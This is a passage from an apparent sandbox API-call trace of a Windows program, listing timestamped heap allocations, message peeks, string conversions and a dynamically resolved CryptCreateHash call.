lpMsg=0x8cf3b8) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.236] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.236] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.236] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.236] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.236] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51d60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0266.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.237] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0266.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0266.238] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0266.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0266.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.244] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0266.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0266.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0266.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0266.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0266.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.246] RtlAllocateHeap 